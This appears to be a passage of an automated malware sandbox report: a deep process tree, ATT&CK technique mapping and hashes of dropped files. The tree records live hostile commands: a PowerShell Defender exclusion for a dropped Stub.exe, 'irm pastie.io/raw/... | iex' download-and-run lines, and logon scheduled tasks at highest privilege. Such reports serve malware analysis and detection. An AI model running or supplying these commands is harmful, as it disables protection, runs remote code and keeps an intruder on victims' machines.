        Scheduled Task/Job: Scheduled Task
        
        PID:3056
      - C:\Users\Admin\AppData\Local\Temp\Xbinder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xbinder.exe"
        6⤵
        Drops startup file
        
        PID:528
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2352
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:2068
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        8⤵
        
        PID:604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        9⤵
        
        PID:2684
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2436
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2888
        
        C:\Users\Admin\AppData\Local\Temp\Xbinder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xbinder.exe"
        7⤵
        Drops startup file
        
        PID:788
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1260
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        8⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1760
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        9⤵
        
        PID:568
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        10⤵
        
        PID:1956
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:480
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2260
        
        C:\Users\Admin\AppData\Local\Temp\Xbinder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xbinder.exe"
        8⤵
        
        PID:1672
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1308
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        9⤵
        
        PID:876
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        10⤵
        
        PID:1224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        11⤵
        
        PID:2096
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        10⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:336
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        10⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1940
        
        C:\Users\Admin\AppData\Local\Temp\Xbinder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xbinder.exe"
        9⤵
        
        PID:2404
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2240
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        10⤵
        
        PID:2668
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        11⤵
        
        PID:832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        12⤵
        
        PID:1668
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        11⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:564
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        11⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2364
        
        C:\Users\Admin\AppData\Local\Temp\Xbinder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xbinder.exe"
        10⤵
        
        PID:1104
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1008
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        11⤵
        
        PID:1472
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        12⤵
        
        PID:1936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        13⤵
        
        PID:1900
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        12⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:996
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        12⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2456
        
        C:\Users\Admin\AppData\Local\Temp\Xbinder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xbinder.exe"
        11⤵
        
        PID:3000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:744
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        12⤵
        
        PID:1512
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        13⤵
        
        PID:1740
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        14⤵
        
        PID:2828
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        13⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1844
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        13⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3068
        
        C:\Users\Admin\AppData\Local\Temp\Xbinder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xbinder.exe"
        12⤵
        
        PID:2632
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2668
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        13⤵
        
        PID:988
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        14⤵
        
        PID:3056
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        15⤵
        
        PID:1760
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        14⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2684
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        14⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1412
        
        C:\Users\Admin\AppData\Local\Temp\Xbinder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xbinder.exe"
        13⤵
        
        PID:2772
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        14⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1880
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        14⤵
        
        PID:1964
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        15⤵
        
        PID:2672
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        16⤵
        
        PID:1980
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        15⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1700
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        15⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2572
        
        C:\Users\Admin\AppData\Local\Temp\Xbinder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xbinder.exe"
        14⤵
        
        PID:992
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1356
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        15⤵
        
        PID:1076
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        16⤵
        
        PID:3004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        17⤵
        
        PID:1140
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        16⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2440
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        16⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:488
        
        C:\Users\Admin\AppData\Local\Temp\Xbinder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xbinder.exe"
        15⤵
        
        PID:2936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        16⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1700
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        16⤵
        
        PID:2604
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        17⤵
        
        PID:1464
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        18⤵
        
        PID:1588
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        17⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1740
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        17⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:992
        
        C:\Users\Admin\AppData\Local\Temp\Xbinder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xbinder.exe"
        16⤵
        
        PID:1356
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2748
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        17⤵
        
        PID:2708
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        18⤵
        
        PID:1508
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        19⤵
        
        PID:2052
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        18⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2508
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        18⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1760
        
        C:\Users\Admin\AppData\Local\Temp\Xbinder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xbinder.exe"
        17⤵
        
        PID:2288

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "154405966176217801-1236263162-1384805925-20353129771492819104-2131648927514634306"
1⤵
PID:2004

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1951718854-8347194681507629772635262509-1530626658621719563-1451237346-1936413823"
1⤵
PID:1072

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2066918009332116551010673724-11050663731029973055-1633286444-8710981571042504663"
1⤵
PID:996

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1466919726-549226433934892524-727472871-1240542255-387364730-15205078271142818876"
1⤵
- Suspicious use of SetWindowsHookEx
PID:2864

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "9724195971165675577-13478639651600865756-449848546223351268101145334625777676"
1⤵
PID:2616

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1329504235-16169322253313083611595709932-634262633-17357276571751481506450564191"
1⤵
PID:1440

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "147529440331506861-988148703-851303383-1436803076127113657334587299-414134177"
1⤵
- Suspicious use of SetWindowsHookEx
PID:1516

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-26670719-498042334-7008789771182581925138268910-1357464247-125815185-1210052820"
1⤵
PID:2036

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-17876263081743917988-1827757913-19959138811532753624-122927536413062045591628483347"
1⤵
PID:2004

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-580623315-1649573327-458065084108886144213202316871351763514-12662164821662176568"
1⤵
PID:2940

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1163935852-467666864-673091197-1842181822048050707-1375191202-931794668-859936571"
1⤵
- Suspicious use of SetWindowsHookEx
PID:1144

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-7905355691963294200-36503318482973910417656288391779675357-770870318639925423"
1⤵
PID:2608

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "4147140266413302441587618599-1867984922-16675791491460397671285428096490941808"
1⤵
PID:2852

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-574289952-1569144162-307405727-1126167508-6788335575017174-1341871557-680942524"
1⤵
PID:2344

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1733015971-497436121-698644387-556030814-764373273-17750157521503549928-1098645950"
1⤵
PID:680

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "438380271-2090767431-7043191451387599631-552918599808010324-17425358041603912842"
1⤵
PID:568

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
1d51fb2eeeb5b2e263f1f1acf3715d58

SHA1
b550390846e21a1c97c0fa6f4d67102be771bcc5

SHA256
a0fef723235074ee2cbca4411370c8e96ff8587e18bddb3ac867ed32e8aced9e

SHA512
9051519e135a1dc2d84235c0fba1e27cc2d8fee8a2b52c9e663bc131b006ee1a51f45c687799ebcc64c62820a511fc3ca68a615f1ab58b8e5292baeaea13bf71

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
5d8b6a51a39078963dc9b3992616772f

SHA1
17b71f13e66cc2841bf4ba4e27fc83b7fad7aa94

SHA256
0dd191c2d18d49afb593bbdefb1ca811bf7c3c03136e0530a43513778f87f730

SHA512
7afd15d9935433abff3797ffd3bd8d430d315814cc7da7b28876a66bb2e97a322d6478c0197d51bc43e6c8ea7a81f4dc5fb9c212de496ccabc5f40741a986d3c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
9d5f9f5b4cbc76d8a06f601f090ed4e1

SHA1
759d41536a7df165a0d72f5c5f7e3a52af9fed30

SHA256
b4c4cfdcdab813adc2a17c0240dd5dee3517062f07385fbba3b356a3427bcdbc

SHA512
bf0df0560e1b7719e6257524eb143b9d907e0a3cb4ffb11b8aec57b83cd9a590cf00af3c9913fca392a780b67dcf45903f96b20df2b2bb34b7398031d17b29ab

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe

Filesize
290KB

MD5
cc63633edfcc147cbaed1959b03d8730

SHA1
df7a250eba6ee1767b09f7923bfd735635deb9e8

SHA256
e699d9e9a81e9de82ce7ed645ef2a92ed6231e32cbc18a7e9ddff5c82623d417

SHA512
a584893714d46c6bdf4cc0a097b5f088a9aa49eea07b181745ca9b351b570c8ac3487bfe53a8a97213f5d8a7f71dbf4070ff92eab58b2ff7a4d0e784e17d02d4

Download Submit
C:\Windows\System32\perfc007.dat

Filesize
141KB

MD5
0f3d76321f0a7986b42b25a3aa554f82

SHA1
7036bba62109cc25da5d6a84d22b6edb954987c0

SHA256
dfad62e3372760d303f7337fe290e4cb28e714caadd3c59294b77968d81fe460

SHA512
bb02a3f14d47d233fbda046f61bbf5612ebc6213b156af9c47f56733a03df1bb484d1c3576569eb4499d7b378eb01f4d6e906c36c6f71738482584c2e84b47d0

Download Submit
C:\Windows\System32\perfc00A.dat

Filesize
150KB

MD5
540138285295c68de32a419b7d9de687

SHA1
1cf6a2a0f53f0516ff9fe5ac733dbb5a9255ae56

SHA256
33867c52f756f2b0f645f4bd503c65969d73676dcb14e6a6fdb2ffb11c7562eb

SHA512
7c17c10d4b6165aa0c208811dc6d98e2f4e75e3da1cc2313cc7da9d657626beb3e4ec00b07b71376a7c549725d40db20d8952753e70acc86e87a8390e224a64a

Download Submit
C:\Windows\System32\perfc00C.dat

Filesize
141KB

MD5
831dbe568992299e589143ee8898e131

SHA1
737726173aab8b76fe1f98104d72bb91abd273bf

SHA256
4f22ef1625fb2a2370779d0992f80b8e5e5da8dc727aa99ade152044d28e9405

SHA512
39015d29d593c9df59cdafbff95a6ddc000a5dbf767665b65f8ec65751e70315918c93d3583b922d32e9b6261b8c07023da660098ca79c5420b782c150b5c139

Download Submit
C:\Windows\System32\perfc010.dat

Filesize
138KB

MD5
cf82e7354e591c1408eb2cc0e29dd274

SHA1
7e91bd50c3e6b64b81e2b5c1ce723f52e34748e9

SHA256
59b5e6fbbe68f47db14a3c045b0ac1abb026c626ca4bee708fbd3940e6d2e06d

SHA512
98bd4809c1c418be4100096bc9df328d2ad435c5615c082fa2bfa424935203107015862cd9c1737800b7f7bd020fea4538c325707927c1557bc3efebffb27620

Download Submit
C:\Windows\System32\perfc011.dat

Filesize
114KB

MD5
1f998386566e5f9b7f11cc79254d1820

SHA1
e1da5fe1f305099b94de565d06bc6f36c6794481

SHA256
1665d97fb8786b94745295feb616a30c27af84e8a5e1d25cd1bcaf70723040ea

SHA512
a7c9702dd5833f4d6d27ce293efb9507948a3b05db350fc9909af6a48bd649c7578f856b4d64d87df451d0efbe202c62da7fffcac03b3fe72c7caaea553de75f

Download Submit
C:\Windows\System32\perfh007.dat

Filesize
668KB

MD5
5026297c7c445e7f6f705906a6f57c02

SHA1
4ec3b66d44b0d44ec139bd1475afd100748f9e91

SHA256
506d3bec72805973df3b2e11aba4d074aeb4b26b7335536e79ea1145108817cc

SHA512
5be8e51ecacda465b905df3e38ac114240d8fa6bae5bb17e8e53a87630454b57514ca0abbd8afefd798d450cd4ee89caf4391eeb837ced384260c188482fb48d

Download Submit
C:\Windows\System32\perfh009.dat

Filesize
634KB

MD5
1c678ee06bd02b5d9e4d51c3a4ec2d2b

SHA1
90aa7fdfaaa37fb4f2edfc8efc3994871087dedb

SHA256
2d168ab31836a08d8ca00aab9685f040aac4052a7f10fbbf0c28e9f880a79dd3

SHA512
ec665d7a20f27b2a0fe2475883009c6d34615cc2046d096de447ef57bcac9da0ae842be0556f5736f42d9c1c601fb8629896a2444990e508f7c573165088ab32

Download Submit
C:\Windows\System32\perfh00A.dat

Filesize
715KB

MD5
340af83514a525c50ffbbf8475ed62b7

SHA1
e2f382ae75afe7df8a323320bbb2aafa1ff6e407

SHA256
fb298e9a90476b4698def395a8ee1974c1cee3959b658662c730da915caea417

SHA512
8236aab579456ef4614ddd5fbfe72d0b0b26617c43a9cd53c3de56d3ac052eee8ca7d70749aaca0692855ecd4fd5f1460ac0b1dd30481dee519b910755c1cc2d

Download Submit
C:\Windows\System32\perfh00C.dat

Filesize
715KB

MD5
718bb9564980029a2e3341093a4bb082

SHA1
8953d96e47b65c2c70f2bcc3d9e2e7c55d41ee61

SHA256
ad7b5314ef00ce846ae2c91a32dd1c1f2b4905cf182005e251ad6d4af66cc977

SHA512
3f22961d108271dc098ae2c75d217991da38c18a587b44abd74da853ea26d171ca1a507c3200f3b7c2a8175bfff5a8b968a551a4804082064dc6f2ef98b5432d

Download Submit
C:\Windows\System32\perfh010.dat

Filesize
710KB

MD5
66fd0e1999023d23c9f8e3cd7a92af77

SHA1
e0e61df319ddbc7c9d425612295f825c47888658

SHA256
bdbadcf6f408c6d223974d52a69413aebe1d50ac7eaeacefa2beb2f7321355d0

SHA512
b8924cdf53eb5589820a16890fa7abdca20dfc3ca44063d3fdaef484f506419dbf9cd660bc80e8dfe7b7eba7d9db8fe0046accc1fca8d3faf70dedfa1ee0e68f

Download Submit
C:\Windows\System32\perfh011.dat

Filesize
394KB

MD5
